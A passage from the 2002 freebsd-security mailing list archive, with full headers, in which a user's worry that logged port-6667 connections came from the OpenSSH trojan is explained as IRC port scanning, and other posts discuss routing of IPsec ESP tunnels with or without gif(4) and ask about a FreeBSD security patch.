owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi All. I need some help here. I 'csvup'd from RELENG_4_5 yesterday, and built and installed the world, bringing my system to 4.5-RELEASE-15. I have since seen the following in /var/log/security: ---8<--- Aug 2 10:27:15 sheol ipmon[70]: 10:27:15.792366 dc1 @1:13 b 216.196.144.24,1166 -> 208.42.101.192,6667 PR tcp len 20 48 -S IN Aug 2 10:27:15 sheol ipmon[70]: 10:27:15.793415 dc1 @1:13 b 216.196.144.24,1167 -> 208.42.101.193,6667 PR tcp len 20 48 -S IN Aug 2 10:27:18 sheol ipmon[70]: 10:27:18.702554 dc1 @1:13 b 216.196.144.24,1166 -> 208.42.101.192,6667 PR tcp len 20 48 -S IN Aug 2 10:27:18 sheol ipmon[70]: 10:27:18.726508 dc1 @1:13 b 216.196.144.24,1167 -> 208.42.101.193,6667 PR tcp len 20 48 -S IN Aug 2 10:27:24 sheol ipmon[70]: 10:27:24.710308 dc1 @1:13 b 216.196.144.24,1166 -> 208.42.101.192,6667 PR tcp len 20 48 -S IN Aug 2 10:27:24 sheol ipmon[70]: 10:27:24.749498 dc1 @1:13 b 216.196.144.24,1167 -> 208.42.101.193,6667 PR tcp len 20 48 -S IN --->8--- From what I've read, the trojan tries to use port 6667, and I haven't got any such log entries to port 6667 prior to my updating to 4.5-RELEASE-p15. Is there something undiscovered, and perhaps sinister, going on here? I'll be happy to provide more data as requested. Please reply by mail to me (and the list, as desired), as I'm not subscribed to -security. Thanks, Dave -- ______________________ ______________________ \__________________ \ D. J. HAWKEY JR. / __________________/ \________________/\ hawkeyd@visi.com /\________________/ http://www.visi.com/~hawkeyd/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 2 10:19:18 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id F0E3837B400 for ; Fri, 2 Aug 2002 10:19:15 -0700 (PDT) Received: from gw.nectar.cc (gw.nectar.cc [208.42.49.153]) by mx1.FreeBSD.org (Postfix) with ESMTP id 7176C43E70 for ; Fri, 2 Aug 2002 10:19:15 -0700 (PDT) (envelope-from nectar@nectar.cc) Received: from madman.nectar.cc (madman.nectar.cc [10.0.1.111]) by gw.nectar.cc (Postfix) with ESMTP id D269A10; Fri, 2 Aug 2002 12:19:14 -0500 (CDT) Received: from madman.nectar.cc (localhost [IPv6:::1]) by madman.nectar.cc (8.12.3/8.12.3) with ESMTP id g72HJEU4050943; Fri, 2 Aug 2002 12:19:14 -0500 (CDT) (envelope-from nectar@madman.nectar.cc) Received: (from nectar@localhost) by madman.nectar.cc (8.12.3/8.12.3/Submit) id g72HJE3r050942; Fri, 2 Aug 2002 12:19:14 -0500 (CDT) Date: Fri, 2 Aug 2002 12:19:14 -0500 From: "Jacques A. Vidrine" To: D J Hawkey Jr Cc: security at FreeBSD Subject: Re: OpenSSL trojan: I seem to have post-install evidence? Message-ID: <20020802171914.GB50692@madman.nectar.cc> Mail-Followup-To: "Jacques A. Vidrine" , D J Hawkey Jr , security at FreeBSD References: <20020802104836.A16486@sheol.localdomain> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20020802104836.A16486@sheol.localdomain> X-Url: http://www.nectar.cc/ User-Agent: Mutt/1.5.1i-ja.1 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Fri, Aug 02, 2002 at 10:48:36AM -0500, D J Hawkey Jr wrote: > Aug 2 10:27:15 sheol ipmon[70]: 10:27:15.792366 dc1 @1:13 b 216.196.144.24,1166 -> 208.42.101.192,6667 PR tcp len 20 48 -S IN This is someone port scanning you for IRC. (Your network is 208.42.101.192/something.) It has nothing to do with OpenSSL or OpenSSH (which is what I assume you really meant) or 4.5-RELEASE-pWhatever or FreeBSD. > From what I've read, the trojan tries to use port 6667, and I haven't got > any such log entries to port 6667 prior to my updating to 4.5-RELEASE-p15. The trojan was never something incorporated into the FreeBSD base system, and the port would report a checksum mismatch. You don't really have anything to worry about unless you manually fetched and installed the trojan'd ssh. Cheers, -- Jacques A. Vidrine http://www.nectar.cc/ NTT/Verio SME . FreeBSD UNIX . Heimdal Kerberos jvidrine@verio.net . nectar@FreeBSD.org . nectar@kth.se To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 2 10:20:46 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 0688D37B435 for ; Fri, 2 Aug 2002 10:20:34 -0700 (PDT) Received: from femme.sapphite.org (pcp02268182pcs.longhl01.md.comcast.net [68.50.99.190]) by mx1.FreeBSD.org (Postfix) with ESMTP id E219943E5E for ; Fri, 2 Aug 2002 10:20:32 -0700 (PDT) (envelope-from trish@bsdunix.net) Received: from localhost (trish@localhost [127.0.0.1]) by femme.sapphite.org (8.12.5/8.12.5) with ESMTP id g72HLZmR006575 for ; Fri, 2 Aug 2002 13:21:35 -0400 (EDT) (envelope-from trish@bsdunix.net) Date: Fri, 2 Aug 2002 13:21:35 -0400 (EDT) From: Trish Lynch X-X-Sender: To: Subject: Re: [Q] FreeBSD IPSec Discussion. In-Reply-To: <20020802093902.K497-100000@femme.sapphite.org> Message-ID: <20020802131910.E6519-100000@femme.sapphite.org> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Lots of people have requested that I document this info somewhere, and I will do so, probably this Sunday, when I have a little free time to myself. I *do* use the gif interface., and I have some pretty stable tunnels, again, YMMV. I've even gotten it to run with interfaces that have packets diverted through natd :) -Trish On Fri, 2 Aug 2002, Trish Lynch wrote: > > No, its so complicated that nobody has the answers :) > > Here or -questions would most likely be the best place. I just recently > learned a hell of a lot about KAME/racoon by trial and error over the past > couple weeks, including interop issues between other vendor's > software/hardware. (specifically Ravlins), so If I can help, I'll attempt > to. > > -Trish > > > -- > Trish Lynch trish@bsdunix.net > FreeBSD The Power to Serve > Ecartis Core Team trish@listmistress.org > http://www.freebsd.org > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > -- Trish Lynch trish@bsdunix.net FreeBSD The Power to Serve Ecartis Core Team trish@listmistress.org http://www.freebsd.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 2 10:27:42 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 5BC6737B400 for ; Fri, 2 Aug 2002 10:27:33 -0700 (PDT) Received: from rwcrmhc52.attbi.com (rwcrmhc52.attbi.com [216.148.227.88]) by mx1.FreeBSD.org (Postfix) with ESMTP id 9E4A743E75 for ; Fri, 2 Aug 2002 10:27:32 -0700 (PDT) (envelope-from crist.clark@attbi.com) Received: from blossom.cjclark.org ([12.234.91.48]) by rwcrmhc52.attbi.com (InterMail vM.4.01.03.27 201-229-121-127-20010626) with ESMTP id <20020802172732.GPWM22139.rwcrmhc52.attbi.com@blossom.cjclark.org>; Fri, 2 Aug 2002 17:27:32 +0000 Received: from blossom.cjclark.org (localhost. [127.0.0.1]) by blossom.cjclark.org (8.12.3/8.12.3) with ESMTP id g72HRVJK007077; Fri, 2 Aug 2002 10:27:31 -0700 (PDT) (envelope-from crist.clark@attbi.com) Received: (from cjc@localhost) by blossom.cjclark.org (8.12.3/8.12.3/Submit) id g72HRT7p007076; Fri, 2 Aug 2002 10:27:29 -0700 (PDT) X-Authentication-Warning: blossom.cjclark.org: cjc set sender to crist.clark@attbi.com using -f Date: Fri, 2 Aug 2002 10:27:29 -0700 From: "Crist J. Clark" To: Eric Masson Cc: Matthew Grooms , dlavigne6@cogeco.ca, Mailing List FreeBSD Security Subject: Re: esp tunnel without gif(4) [Was Re: vpn1/fw1 NG to ipsec/racoon troubles, help please ...] Message-ID: <20020802172729.GA6880@blossom.cjclark.org> Reply-To: cjclark@alum.mit.edu References: <20020730074813.GF89241@blossom.cjclark.org> <86znw5r9h3.fsf_-_@notbsdems.nantes.kisoft-services.com> <86k7n9qv08.fsf@notbsdems.nantes.kisoft-services.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <86k7n9qv08.fsf@notbsdems.nantes.kisoft-services.com> User-Agent: Mutt/1.4i X-URL: http://people.freebsd.org/~cjc/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Fri, Aug 02, 2002 at 02:56:39PM +0200, Eric Masson wrote: > >>>>> "Emss" == Eric Masson writes: > >>>>> "Crist" == Crist J Clark writes: > > Follow-up to myself and -security re-added. > > Crist> I've never figured out why people use gif(4) interfaces when ESP > Crist> does the tunneling for you. > > Emss> Maybe because I've never succeeded establishing a esp tunnel > Emss> beetween two lans without gif(4). > > I've tried without gif tunnel (erroneous rc.conf modification) and it > works, maybe murphy's law had prevented this before ;) > > There's one question still remaining : > - if there are more than one esp tunnel configured, how is traffic > routed ? > > Example : > - One esp tunnel from 192.168.0.1 to 10.93.0.1 > - One esp tunnel from 192.168.0.1 to 10.44.0.1 > > With only one tunnel configured, netstat -rn on the security gateway > doesn't show any routes to the remote networks nor host. > > With a second tunnel added, are there any additionnal configuration > steps or will the kernel do the routing automagically ? It's pretty much automagically done by way of the SPD entry. Any packet that matches the source and destination in the SPD gets put through the appropriate tunnel with the specified end points. It's not the same as the regular routing table and will not show up in 'netstat -rn.' -- Crist J. Clark | cjclark@alum.mit.edu | cjclark@jhu.edu http://people.freebsd.org/~cjc/ | cjc@freebsd.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 2 10:43:28 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 512C437B400 for ; Fri, 2 Aug 2002 10:43:23 -0700 (PDT) Received: from rwcrmhc52.attbi.com (rwcrmhc52.attbi.com [216.148.227.88]) by mx1.FreeBSD.org (Postfix) with ESMTP id A29AD43E75 for ; Fri, 2 Aug 2002 10:43:22 -0700 (PDT) (envelope-from crist.clark@attbi.com) Received: from blossom.cjclark.org ([12.234.91.48]) by rwcrmhc52.attbi.com (InterMail vM.4.01.03.27 201-229-121-127-20010626) with ESMTP id <20020802174322.HKUX22139.rwcrmhc52.attbi.com@blossom.cjclark.org>; Fri, 2 Aug 2002 17:43:22 +0000 Received: from blossom.cjclark.org (localhost. [127.0.0.1]) by blossom.cjclark.org (8.12.3/8.12.3) with ESMTP id g72HhMJK007147; Fri, 2 Aug 2002 10:43:22 -0700 (PDT) (envelope-from crist.clark@attbi.com) Received: (from cjc@localhost) by blossom.cjclark.org (8.12.3/8.12.3/Submit) id g72HhMlu007146; Fri, 2 Aug 2002 10:43:22 -0700 (PDT) X-Authentication-Warning: blossom.cjclark.org: cjc set sender to crist.clark@attbi.com using -f Date: Fri, 2 Aug 2002 10:43:21 -0700 From: "Crist J. Clark" To: Matthew Grooms Cc: freebsd-security@FreeBSD.org Subject: Re: esp tunnel without gif(4) [Was Re: vpn1/fw1 NG to ipsec/racoontroubles, help please ...] Message-ID: <20020802174321.GB6880@blossom.cjclark.org> Reply-To: cjclark@alum.mit.edu References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: User-Agent: Mutt/1.4i X-URL: http://people.freebsd.org/~cjc/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Fri, Aug 02, 2002 at 10:02:38AM -0500, Matthew Grooms wrote: > Eric, > > How traffic will be routed is defined by your near/far encryption > domains that were configured via setkey/spdadd directives. These src/dst > domains are compared to packet src/dst to determine if they need to be > encrypted. The IPSEC peer gateway is also defined for each spdadd so > that your gateway knows where to forward the packets after the > ecrypt/encap step. Yep. > This works a bit different for gif enabled tunnels because the IPSEC > peer gateways are actually defined by the private tunnel interface end > points, not the publicly routable interfaces. Its also possible to use a > mixture if giff'd and 'vanila' ESP tunnels. I am doing this right now so > I have attached my config script as an example. But why? Is there something this configuration buys you that you don't get when all are "vanilla" ESP tunnels? > > > echo Initializing IPSEC security policies ... > > # create tunnel device > ifconfig gif0 create 2> /dev/null > > # public addresses ( external ) > gifconfig gif0 66.90.146.202 66.68.118.215 > > # private addresses ( internal ) > ifconfig gif0 inet 10.22.200.1 10.1.2.1 netmask 255.255.255.0 > > # delete all existing SPD and SAD entries > setkey -FP > setkey -F > setkey -c << EOF > > spdadd 10.22.200.0/24 10.1.2.0/24 any -P out ipsec > esp/tunnel/10.22.200.1-10.1.2.1/require; > spdadd 10.1.2.0/24 10.22.200.0/24 any -P in ipsec > esp/tunnel/10.1.2.1-10.22.200.1/require; You seem to be doing this backwards from the usual way (or what I think of as the usual way)... and I really do not understand why. You are taking traffic from, 10.22.200.0/24 <-> 10.1.2.0/24 And encapsulating it in an ESP tunnel, 10.22.200.1 <-> 10.1.2.1 Which _then_ gets put into an (unencrypted) gif(4) tunnel, 66.90.146.202 <-> 66.68.118.215 When I think of gif(4) tunnels, I think of people doing, 10.22.200.0/24 <-> 10.1.2.0/24 In a gif(4) tunnel, 66.90.146.202 <-> 66.68.118.215 And then running ESP in _transport_ mode between those same two endpoints. I could also see running a tunnel within a tunnel like you have, but again, I would usually expect the ESP tunnel to be the outer one. > spdadd 10.22.200.0/24 10.20.0.0/16 any -P out ipsec > esp/tunnel/66.90.146.202-65.118.63.252/require; > spdadd 10.20.0.0/16 10.22.200.0/24 any -P in ipsec > esp/tunnel/65.118.63.252-66.90.146.202/require; > > spdadd 10.22.200.0/24 10.21.0.0/16 any -P out ipsec > esp/tunnel/66.90.146.202-65.118.63.252/require; > spdadd 10.21.0.0/16 10.22.200.0/24 any -P in ipsec > esp/tunnel/65.118.63.252-66.90.146.202/require; > > spdadd 10.22.200.0/24 10.23.0.0/16 any -P out ipsec > esp/tunnel/66.90.146.202-65.118.63.252/require; > spdadd 10.23.0.0/16 10.22.200.0/24 any -P in ipsec > esp/tunnel/65.118.63.252-66.90.146.202/require; -- Crist J. Clark | cjclark@alum.mit.edu | cjclark@jhu.edu http://people.freebsd.org/~cjc/ | cjc@freebsd.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 2 10:51:24 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 600F337B400 for ; Fri, 2 Aug 2002 10:51:21 -0700 (PDT) Received: from obsidian.sentex.ca (obsidian.sentex.ca [64.7.128.101]) by mx1.FreeBSD.org (Postfix) with ESMTP id 381D343E70 for ; Fri, 2 Aug 2002 10:51:20 -0700 (PDT) (envelope-from mike@sentex.net) Received: from simian.sentex.net (pyroxene.sentex.ca [199.212.134.18]) by obsidian.sentex.ca (8.12.5/8.12.5) with ESMTP id g72HpHSE088393; Fri, 2 Aug 2002 13:51:17 -0400 (EDT) (envelope-from mike@sentex.net) Message-Id: <5.1.1.6.0.20020802134758.040a3e08@marble.sentex.ca> X-Sender: mdtpop@marble.sentex.ca X-Mailer: QUALCOMM Windows Eudora Version 5.1.1 Date: Fri, 02 Aug 2002 13:54:32 -0400 To: cjclark@alum.mit.edu From: Mike Tancsa Subject: Re: esp tunnel without gif(4) [Was Re: vpn1/fw1 NG to ipsec/racoontroubles, help please ...] Cc: freebsd-security@FreeBSD.ORG In-Reply-To: <20020802174321.GB6880@blossom.cjclark.org> References: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed X-Virus-Scanned: By Sentex Communications (obsidian/20020220) X-Spam-Status: No, hits=-3.4 required=7.0 tests=IN_REP_TO version=2.31 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 10:43 AM 02/08/2002 -0700, Crist J. Clark wrote: >But why? Is there something this configuration buys you that you don't >get when all are "vanilla" ESP tunnels? I guess for me, when it gets routed through an interface the "feel" is more consistent. I do a netstat -nr, and I can see where the route points to. I can then also do further firewall rules on traffic via the gif interface. I dont like the fact that my tunnels somehow dont show up in a netstat -nr. I know that sounds trivial, but I think its somewhat important in security matters-- i.e. the admin has a good feeling at a gut level how it all works rather than, "oh yeah, normally it works that way, but not in this case." The less one has to stop and consider "oh yeahs" / exceptions the better IMHO. ---Mike To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 2 10:54:45 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 4F9FA37B400 for ; Fri, 2 Aug 2002 10:54:39 -0700 (PDT) Received: from bodb.mc.mpls.visi.com (bodb.mc.mpls.visi.com [208.42.156.104]) by mx1.FreeBSD.org (Postfix) with ESMTP id C9A7343E77 for ; Fri, 2 Aug 2002 10:54:38 -0700 (PDT) (envelope-from hawkeyd@visi.com) Received: from sheol.localdomain (hawkeyd-fw.dsl.visi.com [208.42.101.193]) by bodb.mc.mpls.visi.com (Postfix) with ESMTP id 9F9D95DC9 for ; Fri, 2 Aug 2002 12:28:54 -0500 (CDT) Received: (from hawkeyd@localhost) by sheol.localdomain (8.11.6/8.11.6) id g72HSp055978 for freebsd-security@freebsd.org; Fri, 2 Aug 2002 12:28:51 -0500 (CDT) (envelope-from hawkeyd) Date: Fri, 2 Aug 2002 12:28:51 -0500 From: D J Hawkey Jr To: security at FreeBSD Subject: Re: OpenSSL trojan: I seem to have post-install evidence? Message-ID: <20020802122851.A55094@sheol.localdomain> Reply-To: hawkeyd@visi.com Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Earlier, I wrote: ----- Forwarded message from D J Hawkey Jr ----- Hi All. I need some help here. I 'csvup'd from RELENG_4_5 yesterday, and built and installed the world, bringing my system to 4.5-RELEASE-15. I have since seen the following in /var/log/security: ---8<--- Aug 2 10:27:15 sheol ipmon[70]: 10:27:15.792366 dc1 @1:13 b 216.196.144.24,1166 -> 208.42.101.192,6667 PR tcp len 20 48 -S IN Aug 2 10:27:15 sheol ipmon[70]: 10:27:15.793415 dc1 @1:13 b 216.196.144.24,1167 -> 208.42.101.193,6667 PR tcp len 20 48 -S IN Aug 2 10:27:18 sheol ipmon[70]: 10:27:18.702554 dc1 @1:13 b 216.196.144.24,1166 -> 208.42.101.192,6667 PR tcp len 20 48 -S IN Aug 2 10:27:18 sheol ipmon[70]: 10:27:18.726508 dc1 @1:13 b 216.196.144.24,1167 -> 208.42.101.193,6667 PR tcp len 20 48 -S IN Aug 2 10:27:24 sheol ipmon[70]: 10:27:24.710308 dc1 @1:13 b 216.196.144.24,1166 -> 208.42.101.192,6667 PR tcp len 20 48 -S IN Aug 2 10:27:24 sheol ipmon[70]: 10:27:24.749498 dc1 @1:13 b 216.196.144.24,1167 -> 208.42.101.193,6667 PR tcp len 20 48 -S IN --->8--- From what I've read, the trojan tries to use port 6667, and I haven't got any such log entries to port 6667 prior to my updating to 4.5-RELEASE-p15. ----- End forwarded message ----- Here's a little more: ---8<--- Aug 2 12:18:18 sheol ipmon[70]: 12:18:17.917483 dc1 @1:13 b 217.162.144.117,33241 -> 208.42.101.192,33483 PR udp len 20 40 IN Aug 2 12:18:23 sheol ipmon[70]: 12:18:22.927437 dc1 @1:13 b 217.162.144.117,33241 -> 208.42.101.192,33484 PR udp len 20 40 IN Aug 2 12:18:59 sheol ipmon[70]: 12:18:58.568630 dc1 @1:13 b 217.162.144.117,33247 -> 208.42.101.193,33483 PR udp len 20 40 IN Aug 2 12:19:04 sheol ipmon[70]: 12:19:03.572959 dc1 @1:13 b 217.162.144.117,33247 -> 208.42.101.193,33484 PR udp len 20 40 IN Aug 2 12:19:10 sheol ipmon[70]: 12:19:10.310476 dc1 @1:13 b 217.162.144.117,1041 -> 208.42.101.193,6667 PR tcp len 20 60 -S IN Aug 2 12:19:13 sheol ipmon[70]: 12:19:13.302950 dc1 @1:13 b 217.162.144.117,1041 -> 208.42.101.193,6667 PR tcp len 20 60 -S IN Aug 2 12:19:17 sheol ipmon[70]: 12:19:16.673305 dc1 @1:13 b 217.162.144.117,1042 -> 208.42.101.192,6667 PR tcp len 20 60 -S IN Aug 2 12:19:20 sheol ipmon[70]: 12:19:19.673198 dc1 @1:13 b 217.162.144.117,1042 -> 208.42.101.192,6667 PR tcp len 20 60 -S IN Aug 2 12:19:23 sheol ipmon[70]: 12:19:22.672113 dc1 @1:13 b 217.162.144.117,1042 -> 208.42.101.192,6667 PR tcp len 20 60 -S IN Aug 2 12:21:55 sheol ipmon[70]: 12:21:54.536656 dc1 @1:13 b 217.162.144.117,1043 -> 208.42.101.193,6667 PR tcp len 20 60 -S IN Aug 2 12:21:58 sheol ipmon[70]: 12:21:57.538491 dc1 @1:13 b 217.162.144.117,1043 -> 208.42.101.193,6667 PR tcp len 20 60 -S IN Aug 2 12:22:01 sheol ipmon[70]: 12:22:00.538145 dc1 @1:13 b 217.162.144.117,1043 -> 208.42.101.193,6667 PR tcp len 20 60 -S IN Aug 2 12:22:04 sheol ipmon[70]: 12:22:03.537041 dc1 @1:13 b 217.162.144.117,1043 -> 208.42.101.193,6667 PR tcp len 20 44 -S IN Aug 2 12:22:07 sheol ipmon[70]: 12:22:06.536146 dc1 @1:13 b 217.162.144.117,1043 -> 208.42.101.193,6667 PR tcp len 20 44 -S IN Aug 2 12:22:10 sheol ipmon[70]: 12:22:09.537220 dc1 @1:13 b 217.162.144.117,1043 -> 208.42.101.193,6667 PR tcp len 20 44 -S IN Aug 2 12:22:16 sheol ipmon[70]: 12:22:15.534979 dc1 @1:13 b 217.162.144.117,1043 -> 208.42.101.193,6667 PR tcp len 20 44 -S IN Aug 2 12:22:28 sheol ipmon[70]: 12:22:27.535148 dc1 @1:13 b 217.162.144.117,1043 -> 208.42.101.193,6667 PR tcp len 20 44 -S IN Aug 2 12:22:37 sheol ipmon[70]: 12:22:36.949576 dc1 @1:13 b 217.162.144.117,1044 -> 208.42.101.192,6667 PR tcp len 20 60 -S IN Aug 2 12:22:40 sheol ipmon[70]: 12:22:39.945236 dc1 @1:13 b 217.162.144.117,1044 -> 208.42.101.192,6667 PR tcp len 20 60 -S IN Aug 2 12:22:43 sheol ipmon[70]: 12:22:42.949236 dc1 @1:13 b 217.162.144.117,1044 -> 208.42.101.192,6667 PR tcp len 20 60 -S IN Aug 2 12:22:46 sheol ipmon[70]: 12:22:45.943690 dc1 @1:13 b 217.162.144.117,1044 -> 208.42.101.192,6667 PR tcp len 20 44 -S IN Aug 2 12:22:49 sheol ipmon[70]: 12:22:48.945132 dc1 @1:13 b 217.162.144.117,1044 -> 208.42.101.192,6667 PR tcp len 20 44 -S IN Aug 2 12:22:52 sheol ipmon[70]: 12:22:51.946179 dc1 @1:13 b 217.162.144.117,1044 -> 208.42.101.192,6667 PR tcp len 20 44 -S IN Aug 2 12:22:58 sheol ipmon[70]: 12:22:57.944014 dc1 @1:13 b 217.162.144.117,1044 -> 208.42.101.192,6667 PR tcp len 20 44 -S IN --->8--- But unlike the first, this address resolves: [sheol] ~$ nslookup 217.162.144.177 Server: sheol.localdomain Address: 192.168.16.2 Name: dclient217-162-144-177.hispeed.ch Address: 217.162.144.177 And also unlike the first, the host tried some UDP first. Are we certain no exploits are in the wild, as of now? I won't post further on this unless it generates some interest. Dave -- ______________________ ______________________ \__________________ \ D. J. HAWKEY JR. / __________________/ \________________/\ hawkeyd@visi.com /\________________/ http://www.visi.com/~hawkeyd/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 2 11: 7:20 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 7E36937B405; Fri, 2 Aug 2002 11:07:14 -0700 (PDT) Received: from bran.mc.mpls.visi.com (bran.mc.mpls.visi.com [208.42.156.103]) by mx1.FreeBSD.org (Postfix) with ESMTP id 102CB43E70; Fri, 2 Aug 2002 11:07:14 -0700 (PDT) (envelope-from hawkeyd@visi.com) Received: from sheol.localdomain (hawkeyd-fw.dsl.visi.com [208.42.101.193]) by bran.mc.mpls.visi.com (Postfix) with ESMTP id 4D5D9503E; Fri, 2 Aug 2002 13:07:13 -0500 (CDT) Received: (from hawkeyd@localhost) by sheol.localdomain (8.11.6/8.11.6) id g72I7CB59150; Fri, 2 Aug 2002 13:07:12 -0500 (CDT) (envelope-from hawkeyd) Date: Fri, 2 Aug 2002 13:07:12 -0500 From: D J Hawkey Jr To: "Jacques A. Vidrine" , security at FreeBSD Subject: Re: OpenSSL trojan: I seem to have post-install evidence? Message-ID: <20020802130712.A59134@sheol.localdomain> Reply-To: hawkeyd@visi.com References: <20020802104836.A16486@sheol.localdomain> <20020802171914.GB50692@madman.nectar.cc> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <20020802171914.GB50692@madman.nectar.cc>; from nectar@freebsd.org on Fri, Aug 02, 2002 at 12:19:14PM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Aug 02, at 12:19 PM, Jacques A. Vidrine wrote: > > On Fri, Aug 02, 2002 at 10:48:36AM -0500, D J Hawkey Jr wrote: > > Aug 2 10:27:15 sheol ipmon[70]: 10:27:15.792366 dc1 @1:13 b 216.196.144.24,1166 -> 208.42.101.192,6667 PR tcp len 20 48 -S IN > > This is someone port scanning you for IRC. (Your network > is 208.42.101.192/something.) It has nothing to do with > OpenSSL or OpenSSH (which is what I assume you really meant) or > 4.5-RELEASE-pWhatever or FreeBSD. Ohhh, IRC uses port 6667? It's not in /etc/services, and I didn't know this. > The trojan was never something incorporated into the FreeBSD base > system, and the port would report a checksum mismatch. You don't > really have anything to worry about unless you manually fetched and > installed the trojan'd ssh. All righty, then! Thanks, Jacques. > Cheers, > Jacques A. Vidrine http://www.nectar.cc/ Dave -- ______________________ ______________________ \__________________ \ D. J. HAWKEY JR. / __________________/ \________________/\ hawkeyd@visi.com /\________________/ http://www.visi.com/~hawkeyd/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 2 11:16: 0 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id EC32F37B400 for ; Fri, 2 Aug 2002 11:15:57 -0700 (PDT) Received: from serv2.vsi.ru (serv2.vsi.ru [80.82.32.11]) by mx1.FreeBSD.org (Postfix) with ESMTP id 7ECA143E5E for ; Fri, 2 Aug 2002 11:15:56 -0700 (PDT) (envelope-from oleg@vsi.ru) Received: (from nobody@localhost) by serv2.vsi.ru (8.9.3/8.9.3) id WAA28720 for freebsd-security@FreeBSD.ORG; Fri, 2 Aug 2002 22:15:48 +0400 (MSD) (envelope-from oleg@vsi.ru) To: freebsd-security@FreeBSD.ORG Subject: SA-02:35 Message-ID: <1028312148.3d4acc54c5eef@webmail.vsi.ru> Date: Fri, 02 Aug 2002 22:15:48 +0400 (MSD) From: Oleg Derevenetz MIME-Version: 1.0 Content-Type: text/plain; charset=koi8-r Content-Transfer-Encoding: 8bit User-Agent: IMP/PHP IMAP webmail program 2.2.8 X-Originating-IP: 80.82.32.19 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi all, I recently visited ftp.freebsd.org, and found directory SA-02:35 in CERT/patches without corresponding advisory in CERT/advisories. Does anyone know something about this SA ? As I understand, it belongs to ffs subsystem. Is it recommended ? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 2 11:30:41 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 1E8F637B405 for ; Fri, 2 Aug 2002 11:30:35 -0700 (PDT) Received: from 